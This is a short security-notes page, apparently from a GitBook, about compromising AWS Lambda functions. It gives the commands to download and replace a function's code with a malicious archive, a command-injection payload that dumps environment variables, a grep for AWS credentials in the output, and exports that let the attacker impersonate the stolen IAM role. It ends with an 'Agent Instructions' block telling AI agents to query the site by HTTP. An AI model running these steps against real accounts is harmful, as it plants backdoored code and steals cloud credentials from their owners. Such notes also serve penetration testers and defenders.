# Code Injection ## Upload malicious code Download lambda source code, unzip the archive alter the source code and create a new archive containing the malicious code ``` wget $(aws lambda get-function --function-name "" --query Code.Location --output text) -O "./source.zip" mkdir dump unzip "source.zip" -d ./dump cd dump zip -r ../compromised.zip ./* ``` Upload the source code ``` aws lambda update-function-code --region --function-name --zip-file fileb://compromised.zip ``` Run code ``` aws lambda invoke --function-name output.json ``` Run with parameters. Use the payload switch and specify your parameters inside a json file stored on your local machine or in the home folder of AWS Cli session ``` aws lambda invoke --function-name --payload fileb://.json output.json ``` ## RCE to IAM Role Compromise Create a payload json file like follows ``` { "": " ; env " } ``` Invoke Lambda function with specified payload and store output in json file ``` aws lambda invoke --function-name --payload fileb://payload.json output.json ``` Search for credentials in output ``` cat output.json | jq -r . | grep AWS ``` Configure local account to impersonate role ``` export AWS_SESSION_TOKEN= export AWS_SECRET_ACCESS_KEY= export AWS_ACCESS_KEY_ID= ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://security-notes.gitbook.io/security-notes/cloud-aws/lambda-function/code-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.